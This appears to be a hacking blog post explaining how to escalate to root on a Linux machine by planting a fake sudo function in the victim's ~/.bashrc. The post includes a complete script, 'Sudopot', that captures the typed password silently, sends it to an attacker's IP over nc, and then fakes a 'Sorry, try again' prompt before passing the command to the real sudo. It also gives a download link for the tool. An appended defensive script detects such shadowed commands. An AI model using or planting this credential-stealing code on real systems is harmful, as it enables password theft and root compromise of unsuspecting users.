After I took control of a Linux machine as an unprivileged user, the next step was privilege escalation to root. Thinking about how to do that, I found a way to capture the user's password by faking the sudo command. Note that by default sudo asks for the user's own password, not root's, and for a user who is allowed to sudo that password is all that is needed for root. If I fake the sudo command and the user later runs some application with sudo, the fake prompts for the password exactly like the real one, and the password is sent to the attacker instead of the command actually being executed. It is half a social engineering attack: the user hands over the password himself, but does not know it. So how did I do it?
In Linux, every interactive bash shell reads the ~/.bashrc file when it starts. You can view it with: cat ~/.bashrc . Among other things, the bashrc file holds the user's aliases (for example the one that makes ls take a --color parameter).
Every user has permission to change his own .bashrc file, so you can add, edit or delete any alias you want there.
So what I did was add an alias to the .bashrc file and name it sudo, like the real command. In an interactive bash shell an alias is expanded before the shell looks the command up in PATH, so the next time the user opens a shell (the file is only read at shell start-up) and types sudo, he lands in my sudo alias instead of /usr/bin/sudo.
Okay, so we have taken over the sudo command, and now we need to imitate the real sudo exactly! If we fail, the user will notice something is wrong, and we don't want to be in that situation.
So let's check the normal sudo command:
quitten@ubuntu:~$ sudo asd
[sudo] password for quitten:
Okay, now we see that we need to print "[sudo] password for <username>:". Easy. But sudo also lets the user type the password without it being echoed to the terminal, so how do we do that? With the stty command: stty -echo turns terminal echo off, which is exactly what sudo does while it reads the password, and stty echo turns it back on afterwards (if you forget that, the user's terminal stays silent and the game is up). So what we have so far:
echo -n "[sudo] password for $(whoami): "; stty -echo; read -r pss; stty echo; echo; echo "$pss"
So far so good, but it is still suspicious if the user types the password and nothing happens. Now we need a way to execute the real sudo command. That part is easy, but wait: the real sudo will ask the user for the password again. So I thought about it and realised that if we tell the user his password was "wrong", the real sudo asking for the password again looks completely normal, because that is exactly what sudo does after a failed attempt. That's it! We have successfully honeypotted the user.
The final code looks like this:
#!/bin/bash
# Sudopot: plant a fake "sudo" in the target user's ~/.bashrc that sends the
# typed password to the attacker, prints sudo's "Sorry, try again." message
# and then hands the command over to the real sudo, which prompts again.
echo 'Welcome to Sudopot version 0.2 by Barak Tawily aka Quitten'
echo "Target Username: $(whoami)"
echo "Please enter attacker ip address:"
read -r ip
echo "Port:"
read -r port

echo 'Open files and injecting code...'
{
    echo "SUDOPOT_IP='$ip'"
    echo "SUDOPOT_PORT='$port'"
    # The alias points at a shell function so that the user's arguments
    # ("$@") reach the real sudo; an alias on its own cannot pass them on.
    cat <<'EOF'
alias sudo='sudopot'
sudopot() {
    printf '[sudo] password for %s: ' "$(whoami)"
    stty -echo                     # hide the typed password, like real sudo
    read -r pss
    stty echo
    echo
    # -w 2 so the shell does not hang if the listener never closes;
    # errors are hidden so a missing listener does not give us away.
    printf '%s\n' "$pss" | nc -w 2 "$SUDOPOT_IP" "$SUDOPOT_PORT" 2>/dev/null
    unset pss
    sleep 2                        # mimic sudo's delay after a wrong password
    echo 'Sorry, try again.'
    # "command" bypasses the alias, so this runs the real sudo (no recursion,
    # hence no state file is needed) and the user is prompted for real.
    command sudo "$@"
}
EOF
} >> ~/.bashrc
echo 'Code injected.'
echo "Please open a nc listener: sudo nc -l $ip $port"
echo 'Have fun while waiting...'
echo 'Sudopot done, bye bye'
You can get the code directly using:
wget http://hackingdefined.org/tools/sudohon.sh
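For the defender's side, here is an added example (written for this edit, not code from the original post or from Sudopot): a small bash script that audits the bash start-up files for exactly the footprint the technique above leaves, an alias or function that redefines sudo or another privilege-sensitive command. The list of watched commands, the list of start-up files, the grep pattern and the FILE:LINE:TEXT output format are this example's own assumptions.

```bash
#!/bin/bash
# Added example, not part of the original post or of the Sudopot script:
# audit bash start-up files for aliases/functions that shadow privilege-
# sensitive commands, which is the trace the fake-sudo trick leaves behind.
# Assumptions (this example's own choices): the watched command list, the
# start-up file list and the FILE:LINE:TEXT output format.

# Commands an attacker would want to shadow.
HOOKED='sudo|su|ssh|passwd|doas'

# Files bash reads when an interactive or login shell starts. Anything they
# source in turn (e.g. ~/.bash_aliases) is a candidate as well.
RC_FILES="$HOME/.bashrc $HOME/.bash_aliases $HOME/.bash_profile $HOME/.bash_login $HOME/.profile"

# find_shadowed FILE...
# Prints FILE:LINE:TEXT for every line that defines an alias or a function
# named like a watched command. Returns 0 if at least one hit was found,
# 1 otherwise. Missing or unreadable files are skipped silently.
find_shadowed() {
    local f status=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        # Matches:  alias sudo=...   sudo() ...   function sudo ...
        if grep -nHE \
            "^[[:space:]]*(alias[[:space:]]+($HOOKED)=|($HOOKED)[[:space:]]*\(\)|function[[:space:]]+($HOOKED)([[:space:]{(]|$))" \
            "$f"; then
            status=0
        fi
    done
    return "$status"
}

# count_shadowed FILE...
# Same scan, but prints only the number of hits (handy for scripted alerts).
count_shadowed() {
    find_shadowed "$@" | wc -l | tr -d ' '
}

# Audit the current user's own start-up files, then show what the running
# shell would actually execute for "sudo": a clean box resolves to a path
# such as /usr/bin/sudo, while a planted hook shows up as an alias/function.
# RC_FILES is intentionally word-split here.
if find_shadowed $RC_FILES; then
    echo "WARNING: privileged command redefined in a start-up file (see above)"
else
    echo "OK: no sudo/su/ssh/passwd/doas overrides in start-up files"
fi
command -V sudo 2>/dev/null || echo "sudo: not found in this shell"
```

Run it as the user you suspect was targeted. The pattern catches function definitions (sudo() or function sudo) as well as alias sudo=, because the same trick works with a function and a function is what is needed to pass the user's arguments through. The quick manual equivalent is typing type sudo in the user's interactive shell: on a clean system it answers with a path such as /usr/bin/sudo, whereas a planted hook is reported as an alias or a function.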